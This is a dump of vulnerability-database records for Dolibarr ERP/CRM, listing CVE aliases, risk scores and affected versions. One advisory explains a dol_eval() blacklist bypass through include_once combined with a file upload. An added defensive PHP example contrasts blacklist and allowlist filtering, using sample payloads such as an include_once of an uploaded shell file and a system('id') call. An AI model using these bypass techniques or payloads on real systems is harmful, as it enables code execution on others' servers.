|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 7 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 8 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 9 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 10 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 11 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 12 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 13 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 14 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 15 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 16 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 17 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 18 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 19 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 20 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 21 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 22 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 23 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 24 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 25 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 26 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 27 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 28 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 29 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 30 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 31 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 32 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 33 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 34 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 35 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 36 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 37 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 38 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 39 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 40 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 41 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.4 |
|
|
| aliases |
CVE-2019-19212, GHSA-pm57-926c-28mr
|
| risk_score |
4.5 |
| exploitability |
0.5 |
| weighted_severity |
9.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-e39t-gvd4-j7ag |
|
| 27 |
|
| 28 |
| url |
VCID-ehb1-ac3n-p7fv |
| vulnerability_id |
VCID-ehb1-ac3n-p7fv |
| summary |
SQL Injection
An SQL injection vulnerability in Dolibarr allows remote attackers to execute arbitrary SQL commands via vectors involving integer parameters without quotes. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@7.0.2 |
| purl |
pkg:composer/dolibarr/dolibarr@7.0.2 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 2 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 3 |
| vulnerability |
VCID-2wnq-rrff-tbbt |
|
| 4 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 5 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 6 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 7 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 8 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 9 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 10 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 11 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 12 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 13 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 14 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 15 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 16 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 17 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 18 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 19 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 20 |
| vulnerability |
VCID-b65k-vs97-63fj |
|
| 21 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 22 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 23 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 24 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 25 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 26 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 27 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 28 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 29 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 30 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 31 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 32 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 33 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 34 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 35 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 36 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 37 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 38 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 39 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 40 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 41 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 42 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 43 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 44 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 45 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 46 |
| vulnerability |
VCID-vvsw-shzx-ufgv |
|
| 47 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 48 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 49 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 50 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 51 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 52 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.2 |
|
|
| aliases |
CVE-2018-10094, GHSA-57wj-22w9-wm9r
|
| risk_score |
10.0 |
| exploitability |
2.0 |
| weighted_severity |
9.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-ehb1-ac3n-p7fv |
|
| 29 |
| url |
VCID-ewrf-wdsh-kqgs |
| vulnerability_id |
VCID-ewrf-wdsh-kqgs |
| summary |
Dolibarr allows a remote privileged attacker to execute arbitrary code via a crafted command/script
An issue in Dolibarr ERP CRM v.17.0.1 and before allows a remote privileged attacker to execute arbitrary code via a crafted command/script. |
| references |
| 0 |
| reference_url |
http://dolibarr.com |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
7.2 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H |
|
| 1 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 2 |
| value |
Track* |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:03:16Z/ |
|
|
| url |
http://dolibarr.com |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
|
| aliases |
CVE-2023-38886, GHSA-6773-rfjv-c54w
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-ewrf-wdsh-kqgs |
|
| 30 |
| url |
VCID-f122-u34a-kfcm |
| vulnerability_id |
VCID-f122-u34a-kfcm |
| summary |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Cross-site Scripting (XSS) - Stored in GitHub repository dolibarr/dolibarr prior to 16.0.5. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2023-5842, GHSA-9pjf-jw9q-fx49
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-f122-u34a-kfcm |
|
| 31 |
| url |
VCID-fa52-4y55-37br |
| vulnerability_id |
VCID-fa52-4y55-37br |
| summary |
Cross-site Scripting
Dolibarr ERP/CRM is affected by multiple reflected Cross-Site Scripting vulnerabilities. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2017-9838 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00185 |
| scoring_system |
epss |
| scoring_elements |
0.40005 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00185 |
| scoring_system |
epss |
| scoring_elements |
0.40061 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00185 |
| scoring_system |
epss |
| scoring_elements |
0.40089 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00185 |
| scoring_system |
epss |
| scoring_elements |
0.40087 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2017-9838 |
|
| 1 |
|
| 2 |
|
| 3 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@5.0.4 |
| purl |
pkg:composer/dolibarr/dolibarr@5.0.4 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-11u2-56qq-cye4 |
|
| 1 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 2 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 3 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 4 |
| vulnerability |
VCID-2wnq-rrff-tbbt |
|
| 5 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 6 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 7 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 8 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 9 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 10 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 11 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 12 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 13 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 14 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 15 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 16 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 17 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 18 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 19 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 20 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 21 |
| vulnerability |
VCID-9xkp-4t9p-eqbb |
|
| 22 |
| vulnerability |
VCID-b65k-vs97-63fj |
|
| 23 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 24 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 25 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 26 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 27 |
| vulnerability |
VCID-ehb1-ac3n-p7fv |
|
| 28 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 29 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 30 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 31 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 32 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 33 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 34 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 35 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 36 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 37 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 38 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 39 |
| vulnerability |
VCID-nmjf-yxwc-m7hj |
|
| 40 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 41 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 42 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 43 |
| vulnerability |
VCID-qrcg-mnfa-k7gv |
|
| 44 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 45 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 46 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 47 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 48 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 49 |
| vulnerability |
VCID-uzz6-3bze-mbez |
|
| 50 |
| vulnerability |
VCID-v5bc-wjmv-ubhx |
|
| 51 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 52 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 53 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 54 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 55 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 56 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 57 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 58 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
| 59 |
| vulnerability |
VCID-zjqj-1zrx-yqh6 |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@5.0.4 |
|
|
| aliases |
CVE-2017-9838, GHSA-726g-cgcq-4xw8
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-fa52-4y55-37br |
|
| 32 |
| url |
VCID-g3x8-rhqm-fuh2 |
| vulnerability_id |
VCID-g3x8-rhqm-fuh2 |
| summary |
Improper Input Validation
dolibarr is vulnerable to Business Logic Errors |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2022-0174 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00244 |
| scoring_system |
epss |
| scoring_elements |
0.47826 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00244 |
| scoring_system |
epss |
| scoring_elements |
0.47876 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00244 |
| scoring_system |
epss |
| scoring_elements |
0.47893 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00244 |
| scoring_system |
epss |
| scoring_elements |
0.47889 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2022-0174 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@15.0.0 |
| purl |
pkg:composer/dolibarr/dolibarr@15.0.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 3 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 4 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 5 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 6 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 7 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 8 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 9 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 10 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 11 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 12 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 13 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 14 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 15 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 16 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 17 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 18 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 19 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 20 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 21 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 22 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 23 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 24 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 25 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0 |
|
|
| aliases |
CVE-2022-0174, GHSA-8qvx-f5gf-g43v
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-g3x8-rhqm-fuh2 |
|
| 33 |
| url |
VCID-hrwp-s15m-ffa1 |
| vulnerability_id |
VCID-hrwp-s15m-ffa1 |
| summary |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
A Cross Site Scripting (XSS) vulnerability exists in Dolibarr via the ticket creation flow. Exploitation requires that an admin copies the payload into a box. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2021-42220 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00271 |
| scoring_system |
epss |
| scoring_elements |
0.50732 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00271 |
| scoring_system |
epss |
| scoring_elements |
0.50778 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00271 |
| scoring_system |
epss |
| scoring_elements |
0.50798 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00271 |
| scoring_system |
epss |
| scoring_elements |
0.50792 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2021-42220 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@14.0.3 |
| purl |
pkg:composer/dolibarr/dolibarr@14.0.3 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 6 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 7 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 8 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 9 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 10 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 11 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 12 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 13 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 14 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 15 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 16 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 17 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 18 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 19 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 20 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 21 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 22 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 23 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 24 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 25 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 26 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 27 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 28 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 29 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.3 |
|
|
| aliases |
CVE-2021-42220, GHSA-jqfp-m5f8-vg28
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-hrwp-s15m-ffa1 |
|
| 34 |
| url |
VCID-htgn-37m4-c7fu |
| vulnerability_id |
VCID-htgn-37m4-c7fu |
| summary |
Dolibarr Allows Code Injection through its Website Module
In Dolibarr ERP & CRM <= 22.0.4, PHP code detection and editing permission enforcement in the Website module is not applied consistently to all input parameters, allowing an authenticated user restricted to HTML/JavaScript editing to inject PHP code through unprotected inputs during website page creation.
A patch is available at https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0. |
| references |
| 0 |
| reference_url |
http://dolibarr.com |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
8.8 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
|
| 1 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 2 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T15:30:39Z/ |
|
|
| url |
http://dolibarr.com |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
| 6 |
|
| 7 |
|
|
| fixed_packages |
|
| aliases |
CVE-2026-31018, GHSA-676v-wh57-p375
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-htgn-37m4-c7fu |
|
| 35 |
| url |
VCID-j345-dk2c-yfds |
| vulnerability_id |
VCID-j345-dk2c-yfds |
| summary |
Dolibarr has Remote Code Execution Vulnerability (Bypass)
The Dolibarr backend provides a function for adding menus and supports setting permissions on the added menu:

This is the trigger point of the vulnerability. The submitted permission can be PHP code, and it is executed when the created menu is viewed:
- htdocs/admin/menus/edit.php

In edit.php, if the created menu has `$menu->perms` set, `dol_eval()` is called. Following `dol_eval()`, we can see that it filters dangerous PHP functions in `$menu->perms` through the blacklist set in `$forbiddenphpfunctions`:

However, the blacklist is not comprehensive. For example, `include_once` and `require_once` are language constructs rather than functions, so they pass the blacklist check, which yields a file inclusion vulnerability. If the `allow_url_include` option is enabled in php.ini, this becomes arbitrary code execution directly. **More seriously, it can be combined with the file upload at `/htdocs/user/document.php?id=1&uploadform=1` to achieve arbitrary code execution more generally, since including a locally uploaded file does not depend on `allow_url_include`.** |
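The gap between a function-name blacklist and what PHP actually parses, as an added example that is not Dolibarr's `dol_eval()` code: a simplified blacklist filter in the spirit of `$forbiddenphpfunctions` next to a token-based, default-deny check built on PHP's `token_get_all()`. The blacklist contents, the allowed identifiers (`isModEnabled`, `$user`, `$conf`) and the sample expressions are assumptions for the demo.

```php
<?php
// Added example (not Dolibarr's dol_eval()): a function-name blacklist in the
// style of $forbiddenphpfunctions next to a token-based check. The blacklist,
// the allowed identifiers and the sample expressions are assumptions for the demo.

// Hypothetical blacklist of dangerous function names.
const FORBIDDEN_FUNCTIONS = [
    'exec', 'system', 'passthru', 'shell_exec', 'popen', 'proc_open',
    'eval', 'assert', 'file_put_contents', 'fopen', 'unlink',
];

// Functions/constants a permission expression may use, and variables it may read.
const ALLOWED_FUNCTIONS = ['isModEnabled', 'true', 'false', 'null'];
const ALLOWED_VARIABLES = ['$user', '$conf'];

// Blacklist filter: substring match on function names, as a simple filter would do.
function blacklistAllows(string $expr): bool
{
    foreach (FORBIDDEN_FUNCTIONS as $fn) {
        if (stripos($expr, $fn) !== false) {
            return false;
        }
    }
    return true;
}

// Token-based filter, default deny: only listed token kinds may appear.
// include/require/eval are language constructs and arrive as T_INCLUDE_ONCE,
// T_REQUIRE_ONCE, T_EVAL ... tokens, never as a function-name string, so a
// name blacklist cannot see them; an allowlist of token kinds refuses them.
function tokenCheckAllows(string $expr): bool
{
    $allowedIds = [
        T_OPEN_TAG, T_WHITESPACE, T_VARIABLE, T_OBJECT_OPERATOR, T_STRING,
        T_CONSTANT_ENCAPSED_STRING, T_LNUMBER, T_BOOLEAN_AND, T_BOOLEAN_OR,
        T_IS_EQUAL, T_IS_NOT_EQUAL, T_IS_IDENTICAL, T_IS_NOT_IDENTICAL,
    ];
    $allowedChars = ['(', ')', '!', ';'];
    $prev = null;
    foreach (token_get_all('<?php ' . $expr . ';') as $tok) {
        if (is_string($tok)) {                       // single-character token
            if (!in_array($tok, $allowedChars, true)) {
                return false;                        // e.g. backtick, which is shell_exec() in disguise
            }
            continue;
        }
        [$id, $text] = $tok;
        if (!in_array($id, $allowedIds, true)) {
            return false;                            // any unexpected token kind is refused
        }
        if ($id === T_VARIABLE && !in_array($text, ALLOWED_VARIABLES, true)) {
            return false;
        }
        // Identifiers after "->" are property names ($user->rights->...);
        // any other bare identifier must be an allowlisted function or constant.
        if ($id === T_STRING && $prev !== T_OBJECT_OPERATOR
            && !in_array($text, ALLOWED_FUNCTIONS, true)) {
            return false;
        }
        if ($id !== T_WHITESPACE) {
            $prev = $id;
        }
    }
    return true;
}

// Constructed sample expressions: a legitimate permission, an include_once payload
// that the blacklist cannot see, and a direct system() call both filters catch.
$samples = [
    '$user->rights->facture->lire && isModEnabled("facture")',
    '$user->admin || include_once "/var/www/documents/users/1/shell.txt"',
    'system("id")',
];
foreach ($samples as $expr) {
    printf("%-70s blacklist=%s tokens=%s\n", $expr,
        blacklistAllows($expr) ? 'allow' : 'deny',
        tokenCheckAllows($expr) ? 'allow' : 'deny');
}
```

Run with `php` from the command line. The second sample is allowed by the blacklist and denied by the token check, which is exactly the bypass the advisory describes. Because the token check allowlists token kinds rather than blacklisting names, alternative spellings such as `\system()` (a namespace separator token in PHP 7, a distinct qualified-name token in PHP 8) are refused as well.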
| references |
|
| fixed_packages |
|
| aliases |
GHSA-49xw-hw94-fmv2
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-j345-dk2c-yfds |
|
| 36 |
| url |
VCID-jbkd-su9m-3udy |
| vulnerability_id |
VCID-jbkd-su9m-3udy |
| summary |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Cross-site Scripting (XSS) - Generic in GitHub repository dolibarr/dolibarr prior to 18.0. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2023-5323, GHSA-39m3-cj8c-886r
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-jbkd-su9m-3udy |
|
| 37 |
| url |
VCID-jy5f-3h8w-qqff |
| vulnerability_id |
VCID-jy5f-3h8w-qqff |
| summary |
Dolibarr ERP/CRM allows SQL Injection. |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@10.0.3 |
| purl |
pkg:composer/dolibarr/dolibarr@10.0.3 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 7 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 8 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
